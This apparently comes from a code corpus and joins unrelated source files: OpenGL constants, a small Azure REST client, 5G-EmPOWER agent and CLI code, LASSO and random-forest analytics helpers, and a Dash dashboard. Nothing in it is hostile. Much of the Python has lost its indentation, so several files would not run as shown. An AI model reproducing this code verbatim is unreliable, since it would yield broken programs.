GL_MAX_PATCH_VERTICES_OES=_C('GL_MAX_PATCH_VERTICES_OES',0x8E7D)
GL_MAX_TESS_CONTROL_ATOMIC_COUNTERS_OES=_C('GL_MAX_TESS_CONTROL_ATOMIC_COUNTERS_OES',0x92D3)
GL_MAX_TESS_CONTROL_ATOMIC_COUNTER_BUFFERS_OES=_C('GL_MAX_TESS_CONTROL_ATOMIC_COUNTER_BUFFERS_OES',0x92CD)
GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS_OES=_C('GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS_OES',0x90CB)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS_OES',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS_OES',0x8E83)
GL_MAX_TESS_CONTROL_SHADER_STORAGE_BLOCKS_OES=_C('GL_MAX_TESS_CONTROL_SHADER_STORAGE_BLOCKS_OES',0x90D8)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS_OES=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS_OES',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS_OES',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS_OES=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS_OES',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS_OES=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS_OES',0x8E7F)
GL_MAX_TESS_EVALUATION_ATOMIC_COUNTERS_OES=_C('GL_MAX_TESS_EVALUATION_ATOMIC_COUNTERS_OES',0x92D4)
GL_MAX_TESS_EVALUATION_ATOMIC_COUNTER_BUFFERS_OES=_C('GL_MAX_TESS_EVALUATION_ATOMIC_COUNTER_BUFFERS_OES',0x92CE)
GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS_OES=_C('GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS_OES',0x90CC)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS_OES=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS_OES',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS_OES=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS_OES',0x8E86)
GL_MAX_TESS_EVALUATION_SHADER_STORAGE_BLOCKS_OES=_C('GL_MAX_TESS_EVALUATION_SHADER_STORAGE_BLOCKS_OES',0x90D9)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS_OES=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS_OES',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS_OES=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS_OES',0x8E8A)
GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS_OES=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS_OES',0x8E80)
GL_MAX_TESS_GEN_LEVEL_OES=_C('GL_MAX_TESS_GEN_LEVEL_OES',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS_OES=_C('GL_MAX_TESS_PATCH_COMPONENTS_OES',0x8E84)
GL_PATCHES_OES=_C('GL_PATCHES_OES',0x000E)
GL_PATCH_VERTICES_OES=_C('GL_PATCH_VERTICES_OES',0x8E72)
GL_PRIMITIVE_RESTART_FOR_PATCHES_SUPPORTED_OES=_C('GL_PRIMITIVE_RESTART_FOR_PATCHES_SUPPORTED_OES',0x8221)
GL_QUADS_OES=_C('GL_QUADS_OES',0x0007)
GL_REFERENCED_BY_TESS_CONTROL_SHADER_OES=_C('GL_REFERENCED_BY_TESS_CONTROL_SHADER_OES',0x9307)
GL_REFERENCED_BY_TESS_EVALUATION_SHADER_OES=_C('GL_REFERENCED_BY_TESS_EVALUATION_SHADER_OES',0x9308)
GL_TESS_CONTROL_OUTPUT_VERTICES_OES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES_OES',0x8E75)
GL_TESS_CONTROL_SHADER_BIT_OES=_C('GL_TESS_CONTROL_SHADER_BIT_OES',0x00000008)
GL_TESS_CONTROL_SHADER_OES=_C('GL_TESS_CONTROL_SHADER_OES',0x8E88)
GL_TESS_EVALUATION_SHADER_BIT_OES=_C('GL_TESS_EVALUATION_SHADER_BIT_OES',0x00000010)
GL_TESS_EVALUATION_SHADER_OES=_C('GL_TESS_EVALUATION_SHADER_OES',0x8E87)
GL_TESS_GEN_MODE_OES=_C('GL_TESS_GEN_MODE_OES',0x8E76)
GL_TESS_GEN_POINT_MODE_OES=_C('GL_TESS_GEN_POINT_MODE_OES',0x8E79)
GL_TESS_GEN_SPACING_OES=_C('GL_TESS_GEN_SPACING_OES',0x8E77)
GL_TESS_GEN_VERTEX_ORDER_OES=_C('GL_TESS_GEN_VERTEX_ORDER_OES',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glPatchParameteriOES(pname,value):pass
```
#### File: Navio2/Python/CUT.py
```python
import urllib.parse
import urllib.request
import json
def get_token():
params = urllib.parse.urlencode({"username": "eric", "password":"<PASSWORD>"}).encode()
    contents = urllib.request.urlopen('http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/auth/login?', data=params)
data = json.loads(contents.read().decode(contents.info().get_param('charset') or 'utf-8'))
return data['token']
def create_Device():
url = 'http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/devices'
data = urllib.parse.urlencode({"deviceTypeKey": 113001, "externalId": "Test05", "name": "Test05", "serviceId": "db39fd3e-7ad5-44be-a817-01fcb608efbb", "smartObjects": [], "metas": {}}).encode()
    headers = {
        'x-access-token': '<KEY>'
    }
    # Pass the auth header via the Request constructor instead of adding it twice.
    req = urllib.request.Request(url, data=data, headers=headers)
response = urllib.request.urlopen(req)
the_page = response.read()
# req = urllib.request.Request('http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/devices?')
# token = "<KEY>"
# req.add_header('x-access-token', '<KEY>')
# contents = urllib.request.urlopen(req, data=params)
# import requests
# from requests.auth import HTTPBasicAuth
# # import json
# # # request = Request
# params = {
# "deviceTypeKey": 113001,
# "externalId": "Test01",
# "name": "Test01",
# "serviceId": "db39fd3e-7ad5-44be-a817-01fcb608efbb",
# "smartObjects": [],
# "metas": {}
# }
# # # headers =
# response = requests.post(
# url,
# data = params,
# header=('x-access-token','<KEY>'))
# # params = urllib.parse.urlencode({
# # "deviceTypeKey": 126001,
# # "externalId": "Test01",
# # "name": "Test01",
# "serviceId": "db39fd3e-7ad5-44be-a817-<KEY>",
# "smartObjects": [],
# "metas": {}
# }).encode()
# contents = urllib.request.urlopen('http://democut3.canadaeast.cloudapp.azure.com/rest/ctcapi/v3/devices', data=params)
# data = json.loads(contents.read().decode(contents.info().get_param('charset') or 'utf-8'))
return the_page
if __name__ == '__main__':
    # token = get_token()
    # print(token)
    data = create_Device()
    # create_Device() returns the raw response body as bytes, so decode and
    # parse it before accessing individual fields.
    device = json.loads(data.decode('utf-8'))
    print(device)
    print(device['id'])
``` |
{
"source": "5g-empower/empower-core",
"score": 2
} |
#### File: empower_core/envmanager/envmanager.py
```python
import uuid
from empower_core.walkmodule import walk_module
from empower_core.service import EService
from empower_core.envmanager.env import Env
from empower_core.envmanager.workercallbackshandler import \
WorkerCallbacksHandler
from empower_core.envmanager.workershandler import WorkersHandler
from empower_core.envmanager.cataloghandler import CatalogHandler
from empower_core.envmanager.envhandler import EnvHandler
class EnvManager(EService):
"""Environment manager."""
HANDLERS = [WorkersHandler, WorkerCallbacksHandler, CatalogHandler,
EnvHandler]
ENV_IMPL = Env
env = None
@property
def catalog(self):
"""Return workers_package."""
return walk_module(self.catalog_packages)
@property
def catalog_packages(self):
"""Return catalog_packages."""
return self.params["catalog_packages"]
@catalog_packages.setter
def catalog_packages(self, value):
"""Set catalog_packages."""
self.params["catalog_packages"] = value
def start(self):
"""Start configuration manager."""
super().start()
if not self.ENV_IMPL.objects.all().count():
self.ENV_IMPL(project_id=uuid.uuid4()).save()
self.env = self.ENV_IMPL.objects.first()
self.env.start_services()
def launch(context, service_id, catalog_packages=""):
""" Initialize the module. """
return EnvManager(context=context, service_id=service_id,
catalog_packages=catalog_packages)
``` |
{
"source": "5g-empower/empower-lvnf-agent",
"score": 2
} |
#### File: empower/agent/agent.py
```python
import time
import logging
import re
import sys
import json
from uuid import UUID
from argparse import ArgumentParser
import websocket
import _thread
from empower.datatypes.etheraddress import EtherAddress
from empower.core.jsonserializer import EmpowerEncoder
from empower.agent.utils import get_xid
from empower.core.image import Image
from empower.agent.lvnf import get_hw_addr
from empower.agent.lvnf import exec_cmd
from empower.agent.lvnf import LVNF
from empower.agent import PT_VERSION
from empower.agent import PT_HELLO
from empower.agent import PT_CAPS_RESPONSE
from empower.agent import PT_LVNF_STATUS_RESPONSE
from empower.agent import PT_LVNF_STATS_RESPONSE
from empower.agent import PT_LVNF_GET_RESPONSE
from empower.agent import PT_LVNF_SET_RESPONSE
from empower.agent import PT_ADD_LVNF_RESPONSE
from empower.agent import PT_DEL_LVNF_RESPONSE
BRIDGE = "br-ovs"
DEFAULT_EVERY = 2
CTRL_IP = "127.0.0.1"
CTRL_PORT = 4422
CLICK_LISTEN = 7000
OF_CTRL = None
def dump_message(message):
"""Dump a generic message.
Args:
message, a message
Returns:
None
"""
header = "Received %s seq %u" % (message['type'], message['seq'])
del message['version']
del message['type']
del message['seq']
    fields = ["%s=%s" % (k, v) for k, v in message.items()]
logging.info("%s (%s)", header, ", ".join(fields))
def on_open(websock):
    """ Called when the web-socket is opened. """
    logging.info("Socket %s opened...", websock.url)
    websock.send_hello()
    # Start the periodic hello loop once the socket is up.
    _thread.start_new_thread(run, (websock,))
def run(websock):
    """Periodically send hello messages while the socket is connected."""
    if websock.sock and websock.sock.connected:
        time.sleep(websock.every)
        websock.send_hello()
        _thread.start_new_thread(run, (websock,))
def on_message(websock, message):
""" Called on receiving a new message. """
try:
websock.downlink_bytes += len(message)
msg = json.loads(message)
websock.handle_message(msg)
except ValueError as ex:
logging.info("Invalid input: %s", ex)
logging.info(message)
def on_close(websock):
""" Called when the web-socket is closed. """
logging.info("Socket %s closed...", websock.url)
class EmpowerAgent(websocket.WebSocketApp):
"""The Empower Agent.
Attributes:
bridge: The OpenVSwitch bridge used by this agent
addr: This agent id (EtherAddress)
seq: The next sequence number (int)
prefix: The next virtual network function interface prefix (int)
every: The hello period (in s)
functions: the currently deployed lvnfs
vnf_seq: the next virtual tap interface id
"""
def __init__(self, url, ctrl, bridge, every, listen, logdir):
super().__init__(url)
self.__bridge = None
self.__ctrl = None
self.__seq = 0
self.__prefix = 0
self.__vnf_seq = 0
self.addr = None
self.dpid = None
self.every = every
self.listen = listen
self.functions = {}
self.lvnfs = {}
self.downlink_bytes = 0
self.uplink_bytes = 0
self.bridge = bridge
self.ctrl = ctrl
self.on_open = None
self.on_close = None
self.on_message = None
self.click = "/usr/local/bin/click"
self.logdir = logdir
logging.info("Initializing the EmPOWER Agent...")
logging.info("Bridge %s (hwaddr=%s, dpid=%s)",
self.bridge, self.addr, self.dpid)
for port in self.ports.values():
logging.info("Port %u (iface=%s, hwaddr=%s)",
port['port_id'], port['iface'], port['hwaddr'])
def shutdown(self):
"""Gracefully stop agent."""
for lvnf in self.lvnfs.values():
lvnf.stop(0)
@property
def ports(self):
"""Return the ports on the bridge.
Fetch the list of ports currently defined on the OVS switch.
Returns:
            A dict mapping port ids to interface names and hardware addresses.
            For example:
            {1: {'port_id': 1, 'iface': 'eth0', 'hwaddr': EtherAddress('11:22:33:44:55:66')}}
Raises:
            OSError: An error occurred accessing the interface.
FileNotFoundError: an OVS utility is not available.
"""
ports = {}
if not self.bridge:
raise OSError('Bridge is not defined')
cmd = ["ovs-ofctl", "show", self.bridge]
lines = exec_cmd(cmd).split('\n')
for line in lines:
regexp = r'([0-9]*)\((.*)\): addr:([0-9a-fA-F:]*)'
mat = re.match(regexp, line.strip())
if mat:
groups = mat.groups()
ports[int(groups[0])] = {'port_id': int(groups[0]),
'iface': groups[1],
'hwaddr': EtherAddress(groups[2])}
return ports
@property
def bridge(self):
"""Return the bridge."""
return self.__bridge
@bridge.setter
def bridge(self, bridge):
"""Set the bridge.
Set the bridge for this agent. The method checks if a bridge with the
specified name exists and then tries to fetch the list of ports on
this switch.
Args:
bridge: The name of the bridge as a string.
Returns:
None
Raise:
            OSError: An error occurred accessing the interface.
FileNotFoundError: an OVS utility is not available.
"""
self.addr = EtherAddress(get_hw_addr(bridge))
self.__bridge = bridge
cmd = ["ovs-ofctl", "show", self.bridge]
lines = exec_cmd(cmd).split('\n')
for line in lines:
if "dpid" in line:
dpid = line.split("dpid:")[1]
self.dpid = ':'.join(dpid[i:i + 2].upper()
for i in range(0, len(dpid), 2))
cmd = ["ovs-vsctl", "list-ports", self.bridge]
lines = exec_cmd(cmd).split('\n')
for line in lines:
regexp = 'vnf-([A-Za-z0-9]*)-([0-9]*)-([0-9]*)'
match = re.match(regexp, line.strip())
if match:
groups = match.groups()
iface = "vnf-%s-%s-%s" % groups
logging.info("Stale port found %s", iface)
exec_cmd(["ovs-vsctl", "del-port", self.bridge, iface])
@property
def ctrl(self):
"""Return the ctrl."""
return self.__ctrl
@ctrl.setter
def ctrl(self, ctrl):
"""Set the ctrl.
Set the controller for the bridge used by this agent. This must be
called AFTER setting the bridge otherwise the method will fail.
Args:
ctrl: the controller url in the for tcp:<ip>:<port>
Returns:
None
Raise:
            OSError: An error occurred accessing the interface.
FileNotFoundError: an OVS utility is not available.
"""
if not ctrl:
self.__ctrl = None
return
cmd = ["ovs-vsctl", "set-controller", self.bridge, ctrl]
exec_cmd(cmd)
self.__ctrl = ctrl
@property
def vnf_seq(self):
"""Return new VNF seq."""
self.__vnf_seq += 1
return self.__vnf_seq
@property
def seq(self):
"""Return the next sequence number."""
self.__seq += 1
return self.__seq
def prefix(self):
"""Return the next virtual network function interface prefix."""
self.__prefix += 1
return self.__prefix
def handle_message(self, msg):
""" Handle incoming message (as a Python dict). """
handler_name = "_handle_%s" % msg['type']
if not hasattr(self, handler_name):
logging.info("Unknown message type: %s", msg['type'])
return
handler = getattr(self, handler_name)
handler(msg)
def send_message(self, message_type, message, xid):
"""Add fixed header fields and send message. """
message['version'] = PT_VERSION
message['type'] = message_type
message['cpp'] = self.addr
message['seq'] = self.seq
message['xid'] = xid
logging.info("Sending %s seq %u xid %u",
message['type'],
message['seq'],
message['xid'])
msg = json.dumps(message, cls=EmpowerEncoder)
self.uplink_bytes += len(msg)
self.send(msg)
def send_hello(self):
""" Send HELLO message. """
hello = {'every': self.every}
self.send_message(PT_HELLO, hello, get_xid())
def send_caps_response(self, xid):
""" Send CAPS RESPONSE message. """
caps = {'dpid': self.dpid, 'ports': self.ports}
self.send_message(PT_CAPS_RESPONSE, caps, xid)
def send_lvnf_status_response(self, xid):
""" Send STATUS FUNCTION message. """
for lvnf in self.lvnfs.values():
self.send_message(PT_LVNF_STATUS_RESPONSE, lvnf.to_dict(), xid)
def send_add_lvnf_response(self, lvnf_id, xid):
""" Send ADD_LVNF_RESPONSE message. """
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
status = self.lvnfs[lvnf_id].to_dict()
self.send_message(PT_ADD_LVNF_RESPONSE, status, xid)
def send_del_lvnf_response(self, lvnf_id, xid):
""" Send DEL_LVNF_RESPONSE message. """
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
status = self.lvnfs[lvnf_id].to_dict()
self.send_message(PT_DEL_LVNF_RESPONSE, status, xid)
def _handle_caps_request(self, message):
"""Handle CAPS_REQUEST message.
Args:
message, a CAPS_REQUEST message
Returns:
None
"""
dump_message(message)
self.send_caps_response(message['xid'])
def _handle_lvnf_status_request(self, message):
"""Handle STATUS_LVNF message.
Args:
message, a STATUS_LVNF message
Returns:
None
"""
dump_message(message)
self.send_lvnf_status_response(message['xid'])
def _handle_lvnf_stats_request(self, message):
"""Handle LVNF_STATS message.
Args:
message, a LVNF_STATS message
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
message['stats'] = self.lvnfs[lvnf_id].stats()
self.send_message(PT_LVNF_STATS_RESPONSE, message, message['xid'])
def _handle_add_lvnf(self, message):
"""Handle ADD_LVNF message.
Args:
message, a ADD_LVNF message
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
tenant_id = UUID(message['tenant_id'])
context = message['context']
xid = message['xid']
image = Image(nb_ports=message['image']['nb_ports'],
vnf=message['image']['vnf'],
state_handlers=message['image']['state_handlers'],
handlers=message['image']['handlers'],)
lvnf = LVNF(agent=self,
lvnf_id=lvnf_id,
tenant_id=tenant_id,
image=image,
bridge=self.bridge,
vnf_seq=self.vnf_seq,
context=context)
lvnf.start(xid)
def _handle_del_lvnf(self, message):
"""Handle DEL_LVNF message.
Args:
message, a DEL_LVNF message
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
xid = message['xid']
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
lvnf = self.lvnfs[lvnf_id]
lvnf.stop(xid)
def _handle_lvnf_get_request(self, message):
"""Handle an incoming LVNF_GET_REQUEST.
Args:
message, a LVNF_GET_REQUEST
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
lvnf = self.lvnfs[lvnf_id]
ret = lvnf.read_handler(message['handler'])
message['retcode'] = ret[0]
message['samples'] = ret[1]
self.send_message(PT_LVNF_GET_RESPONSE, message, message['xid'])
def _handle_lvnf_set_request(self, message):
"""Handle an incoming LVNF_SET_REQUEST.
Args:
message, a LVNF_SET_REQUEST
Returns:
None
"""
dump_message(message)
lvnf_id = UUID(message['lvnf_id'])
if lvnf_id not in self.lvnfs:
raise KeyError("LVNF %s not found" % lvnf_id)
lvnf = self.lvnfs[lvnf_id]
ret = lvnf.write_handler(message['handler'], message['value'])
message['retcode'] = ret[0]
message['samples'] = ret[1]
self.send_message(PT_LVNF_SET_RESPONSE, message, message['xid'])
def main():
"""Parse the command line and set the callbacks."""
usage = "%s [options]" % sys.argv[0]
parser = ArgumentParser(usage=usage)
parser.add_argument("-l", "--logdir", dest="logdir", default=None,
help="Logfile; default=None")
parser.add_argument("-o", "--ofctrl", dest="ofctrl", default=OF_CTRL,
help="OpenFlow Controller; default=%s" % OF_CTRL)
parser.add_argument("-c", "--ctrl", dest="ctrl", default=CTRL_IP,
help="Controller address; default=%s" % CTRL_IP)
parser.add_argument("-p", "--port", dest="port", default=CTRL_PORT,
type=int,
help="Controller port; default=%u" % CTRL_PORT)
parser.add_argument("-b", "--bridge", dest="bridge", default=BRIDGE,
help="Bridge interface; default='%s'" % BRIDGE)
parser.add_argument("-t", "--transport", dest="transport", default="ws",
help="Specify the transport; default='ws'")
parser.add_argument("-e", "--every", dest="every", default=DEFAULT_EVERY,
help="Heartbeat (in s); default='%u'" % DEFAULT_EVERY)
parser.add_argument("-g", "--listen", dest="listen", default=CLICK_LISTEN,
type=int,
help="Click port; default=%u" % CLICK_LISTEN)
(args, _) = parser.parse_known_args(sys.argv[1:])
if args.logdir:
logging.basicConfig(filename=args.logdir + "/agent.log",
level=logging.DEBUG)
else:
logging.basicConfig(level=logging.DEBUG)
url = "%s://%s:%u/" % (args.transport, args.ctrl, args.port)
agent = EmpowerAgent(url, args.ofctrl, args.bridge, args.every,
args.listen, args.logdir)
agent.on_open = on_open
agent.on_message = on_message
agent.on_close = on_close
while True:
try:
logging.info("Trying to connect to controller %s", url)
agent.run_forever()
logging.info("Unable to connect, trying again in %us", agent.every)
time.sleep(agent.every)
except KeyboardInterrupt:
agent.shutdown()
sys.exit()
if __name__ == "__main__":
main()
``` |
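A sketch of starting the agent programmatically rather than through main(); it mirrors the CLI defaults shown above and assumes an OVS bridge named 'br-ovs' exists and a controller is listening on ws://127.0.0.1:4422/:
```python
# Sketch only: mirrors the defaults used by main() above.
from empower.agent.agent import EmpowerAgent, on_open, on_message, on_close

agent = EmpowerAgent("ws://127.0.0.1:4422/", None, "br-ovs", 2, 7000, None)
agent.on_open = on_open
agent.on_message = on_message
agent.on_close = on_close
agent.run_forever()
```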
{
"source": "5g-empower/empower-runtime",
"score": 2
} |
#### File: cli/projects_commands/list_projects.py
```python
import empower_core.command as command
def do_cmd(gargs, *_):
"""List projects. """
_, data = command.connect(gargs, ('GET', '/api/v1/projects'), 200)
for entry in data.values():
accum = []
accum.append("project_id ")
accum.append(entry['project_id'])
accum.append(" desc \"%s\"" % entry['desc'])
if 'wifi_props' in entry and entry['wifi_props']:
accum.append(" ssid \"%s\"" % entry['wifi_props']['ssid'])
if 'lte_props' in entry and entry['lte_props']:
accum.append(" plmnid \"%s\"" % entry['lte_props']['plmnid'])
print(''.join(accum))
``` |
{
"source": "5genesis/Analytics",
"score": 3
} |
#### File: Feature_Selection/feature_selection/LASSO.py
```python
import pandas as pd
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.linear_model import Lasso
def LASSO(df,target,alpha=.1,drop_features=[]):
#remove non numeric columns and undesired features from dataframe
df=df.select_dtypes(exclude=['object'])
const_feat=list(df.columns[df.nunique() <= 1])
drop_features=drop_features+const_feat
df = df.drop(drop_features, axis=1)
df.dropna(inplace=True)
#if target constant avoid crashing
if target in const_feat:
score=[0 for feat in df.columns]
score = pd.Series(score,index = list(df.columns))
return None, list(df.columns), score
#scale data before using Lasso
scaler=StandardScaler()
scaler.fit(df)
df[df.columns]=scaler.transform(df[df.columns])
    y = df[target]
    X = df.drop(target, axis=1)
#lr = LinearRegression()
#lr.fit(X, y)
    # The higher the alpha value, the stronger the restriction on the coefficients;
    # with a low alpha the coefficients are barely restricted and the fit
    # resembles ordinary linear/ridge regression.
    rr = Lasso(alpha=alpha, max_iter=int(1e5))
rr.fit(X, y)
coef = pd.Series(rr.coef_, index = X.columns)
#imp_coef = coef.sort_values()
new_features=list(coef[coef!=0].index)
original_features=list(X.columns)
return new_features, original_features, coef
```
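A hypothetical usage sketch of the function above; the CSV file and column name are illustrative and not part of the module:
```python
import pandas as pd
from feature_selection.LASSO import LASSO  # import path assumed from the package layout

df = pd.read_csv("measurements.csv")  # illustrative input
selected, original, coefficients = LASSO(df, target="throughput", alpha=0.1)
print("Selected features:", selected)
print(coefficients.sort_values())
```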
#### File: Prediction/prediction/random_forest.py
```python
__author__ = '<NAME>'
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error, explained_variance_score
from sklearn.model_selection import cross_val_score
"""
Computing random forest on the data
"""
def random_forest(dataframe, target=None, drop_features=[], split=0.2, cross_val=False):
# Remove non-numerical and undesired features from dataframe
dataframe = dataframe.loc[:, dataframe.dtypes != 'object']
dataframe = dataframe.drop(drop_features, axis=1)
# Transform data into columns and define target variable
numerical_features = dataframe.loc[:, dataframe.columns != target]
X = np.nan_to_num(numerical_features.to_numpy()) # .reshape(numerical_features.shape)
y = np.nan_to_num(dataframe[target].to_numpy()) # .reshape(dataframe[target].shape[0], 1)
# Split the data into training/testing sets
testsplit = round(split * X.shape[0])
X_train = X[:-testsplit]
X_test = X[-testsplit:]
y_train = y[:-testsplit]
y_test = y[-testsplit:]
    # Train random forest regression model
    reg = RandomForestRegressor(max_depth=7, n_estimators=100, min_samples_split=2, min_samples_leaf=3,
                                bootstrap=True, criterion='squared_error',  # 'squared_error' replaces the deprecated 'mse' (scikit-learn >= 1.0)
                                max_features=None)
reg.fit(X_train, y_train)
feature_importance = pd.Series(reg.feature_importances_, index=numerical_features.columns)
# Prediction with trained model
y_pred = reg.predict(X_test)
    results = pd.Series(dtype=object)  # explicit dtype avoids the empty-Series DeprecationWarning
if not cross_val:
results['Train mean'] = np.mean(y_train)
results['Train std'] = np.std(y_train)
results['Test mean'] = np.mean(y_test)
results['Test std'] = np.std(y_test)
results['Prediction mean'] = np.mean(y_pred)
results['Prediction std'] = np.std(y_pred)
results['Mean Squared Error'] = mean_squared_error(y_test, y_pred)
results['Mean Absolute Error'] = mean_absolute_error(y_test, y_pred)
results['R2 score'] = r2_score(y_test, y_pred)
results['Explained variance score'] = explained_variance_score(y_test, y_pred)
    else:
        # Compute each set of cross-validation scores once and reuse it for the mean and the raw values
        r2_scores = cross_val_score(reg, X, y, cv=10, scoring="r2")
        ev_scores = cross_val_score(reg, X, y, cv=10, scoring="explained_variance")
        results['Cross-val R2 score (mean)'] = np.mean(r2_scores)
        results['Cross-val R2 scores'] = r2_scores
        results['Cross-val explained_variance score (mean)'] = np.mean(ev_scores)
        results['Cross-val explained_variance scores'] = ev_scores
y_result = pd.DataFrame({'y_test': y_test, 'y_pred': y_pred})
return feature_importance, results, y_result, reg
```
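A minimal usage sketch (not part of the repository), assuming the `random_forest` function above is importable; the synthetic dataframe and column names are illustrative only.
```python
import numpy as np
import pandas as pd
# from prediction.random_forest import random_forest  # hypothetical import path

rng = np.random.default_rng(1)
df = pd.DataFrame({'f1': rng.normal(size=300), 'f2': rng.uniform(size=300)})
df['kpi'] = df['f1'] ** 2 + 5 * df['f2'] + 0.1 * rng.normal(size=300)

importance, results, y_result, model = random_forest(df, target='kpi', split=0.2)
print(importance.sort_values(ascending=False))
print(results[['R2 score', 'Mean Absolute Error']])
```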
#### File: Visualization/visualization/__main__.py
```python
__author__ = '<NAME>, SRL'
from flask import Flask, send_file
import plotly
import plotly.graph_objects as go
import dash
import dash_table
from dash_table.Format import Format, Scheme
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
import numpy as np
from dash.dependencies import Input, Output, State
import json
import requests
from urllib.parse import urlparse, parse_qs
import pandas as pd
from datetime import datetime
from io import BytesIO
import jwt
from typing import List, Tuple
class Crypt:
def __init__(self, secret: str):
self.secret = secret
def Encode(self, target: int, executions: List[int]) -> str:
"""'target' is the landing experiment execution, 'executions' is
the list of all executions belonging to the user"""
payload = {"t": target, "l": executions}
token = jwt.encode(payload, self.secret, algorithm="HS256")
if isinstance(token, bytes): # Older versions of jwt return bytes
token = token.decode(encoding="UTF-8")
return token
def Decode(self, token: str) -> Tuple[int, List[int]]:
"""Returns a tuple (<landing execution>, <list of executions>)"""
payload = jwt.decode(token, self.secret, algorithms=["HS256"])
return payload["t"], payload["l"]
server = Flask(__name__)
@server.route('/', methods=['GET'])
def index():
return {'about': "Visualization service for 5Genesis Analytics Component. Visit /help for more info and /dash to bring up the dashboard."}, 200
# Fetch the data source options
def fetch_datasource_options():
link = "http://data_handler:5000/get_datasources"
try:
data = requests.get(link).json()
return [{'label': item, 'value': item} for item in data['sources']]
except requests.HTTPError:
return [{'label': 'No datasource available', 'value': ''}]
datasource_options = fetch_datasource_options()
app = dash.Dash(
__name__,
server=server,
routes_pathname_prefix='/dash/',
external_stylesheets=[dbc.themes.BOOTSTRAP]
)
stat_indicators = ['Mean', 'Standard Deviation', 'Median', 'Min', 'Max',
'25% Percentile', '75% Percentile', '5% Percentile', '95% Percentile']
app.layout = dbc.Container([
dcc.Location(id='url', refresh=False),
dbc.Row([
dbc.Col([
html.Div([
html.Img(src=app.get_asset_url('5genesis_logo.png'), # from https://pbs.twimg.com/media/EWm7hjlX0AUl_AJ.png
style={'height': '12rem', 'width': '12rem', 'border-radius': '50%'}),
html.H2("Analytics", style={'margin-top': '2rem'})
], style={'display': 'block', 'text-align': 'center', 'padding-top': '2rem'}),
html.Br(),
html.Div([
html.Div('Database'),
dcc.Dropdown(
options=datasource_options,
value=datasource_options[0]['value'],
id='datasource',
searchable=False,
clearable=False
)
]),
html.Br(),
html.Div([
html.Div('Experiment ID'),
dcc.Dropdown(id='experiment')
]),
html.Br(),
html.Div([
html.Div('Measurement Table'),
dcc.Dropdown(
id='measurement',
multi=True)
]),
html.Br(),
html.Div([
html.Div('Available Features'),
dcc.Dropdown(id='kpi', multi=True)
]),
html.Br(),
html.Hr(),
html.Br(),
html.Div([
html.Div('Outlier Detection Algorithm'),
dcc.Dropdown(
options=[
{'label': 'None', 'value': 'None'},
{'label': 'Z-score', 'value': 'zscore'},
{'label': 'MAD', 'value': 'mad'}],
value='None',
id='outlier',
searchable=False,
clearable=False
)]),
html.Br(),
html.Div([
html.Div('Time resolution'),
dcc.Input(
id="time_resolution",
type='text',
placeholder="1s",
value='1s',
style={'width': '75px'}
)
]),
html.Br(),
html.Div(
html.A(
dbc.Button('Reset', id='purge_cache_button'),
href='/dash/'
), style={'textAlign': 'center'})
], width=2, style={'background-color': "#f8f9fa"}),
dbc.Col([
# Hidden divisions to store data that'll be used as input for different callbacks
html.Div(id='df', style={'display': 'none'}),
html.Div(id='df_no_outliers', style={'display': 'none'}),
html.Div(id='test_case_stat_df', style={'display': 'none'}),
html.Div(id='it_stat_df', style={'display': 'none'}),
# html.Div(id='corr_matrix_download_data', style={'display': 'none'}),
# html.Div(id='corr_table_download_data', style={'display': 'none'}),
html.Div(id='prediction_results_df', style={'display': 'none'}),
# html.Br(),
# Create tabs
dcc.Tabs(id='tabs', value='time-series-tab', children=[
# Time Series tab
dcc.Tab(label='Time Series Overview', value='time-series-tab', children=[
# Time series graph
dbc.Row(dbc.Col(dcc.Graph(id='graph'))),
